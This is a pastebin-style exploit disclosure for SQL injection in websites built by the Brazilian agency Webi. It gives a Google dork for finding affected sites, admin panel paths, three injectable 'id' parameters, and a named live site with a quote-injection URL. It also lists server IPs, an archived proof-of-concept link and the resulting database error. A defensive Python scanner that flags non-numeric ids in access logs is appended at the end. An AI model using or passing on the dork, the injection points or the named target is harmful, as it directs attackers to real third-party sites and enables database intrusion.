KingSkrupellos

Desenvolvimento Agência IndustriaWeb Webi.Com.Br SQL Inj

Jan 10th, 2019
#################################################################

# Exploit Title : Desenvolvimento Agência IndustriaWeb Webi.Com.Br SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 11/01/2019
# Vendor Homepage : webi.com.br
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:"Desenvolvido por WEBI" site:br
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################

# Admin Panel Login Path :
*************************

/sacwebi/
/wp-login.php

# SQL Injection Exploit :
***********************

/site/ver_evento.php?id=[SQL Injection]

/site/ver_galeria.php?id=[SQL Injection]

/wp-content/themes/CherryFramework/index.php?id=[SQL Injection]

#################################################################

# Example Vulnerable Site :
*************************
Note => (186.202.153.171) => There are 882 domains hosted on this server.

Note => (177.70.25.35) => There are 28 domains hosted on this server.

[+] ajut.org.br/site/ver_evento.php?id=299%27 =>

[ Proof of Concept for SQL Inj ] => archive.fo/vSgnj

#################################################################

# SQL Database Error :
**********************

You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right
syntax to use near ''299''' at line 1

#################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################
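
A detection-side reading of the advisory, as an added example that is not part of the original paste: the script flags access-log requests to the three listed scripts whose `id` parameter is not a plain integer, which is the input shape that produced the MySQL error shown above. The combined log format, the 10-digit limit, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoints named in the advisory; each takes a database key in `id`.
WATCHED_PATHS = {
    "/site/ver_evento.php",
    "/site/ver_galeria.php",
    "/wp-content/themes/CherryFramework/index.php",
}

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_id(line):
    """Return the decoded `id` value if the line hits a watched path with a
    non-numeric (or empty) id, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if url.path not in WATCHED_PATHS:
        return None
    # parse_qsl percent-decodes, so %27 is compared as a literal quote.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key == "id" and not re.fullmatch(r"[0-9]{1,10}", value):
            return value
    return None

def scan(lines):
    """Return (line_number, id_value) for every flagged log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        value = suspicious_id(line)
        if value is not None:
            hits.append((n, value))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Jan/2019:10:00:01 -0300] "GET /site/ver_evento.php?id=299 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [11/Jan/2019:10:00:07 -0300] "GET /site/ver_evento.php?id=299%27 HTTP/1.1" 200 312',
    '192.0.2.10 - - [11/Jan/2019:10:01:30 -0300] "GET /site/ver_galeria.php?id=12 HTTP/1.1" 200 7433',
    '192.0.2.44 - - [11/Jan/2019:10:02:02 -0300] "GET /site/contato.php?id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: non-numeric id {value!r}")
```

The same integer-only rule applied server-side, together with a parameterized query, removes the condition the error message reveals.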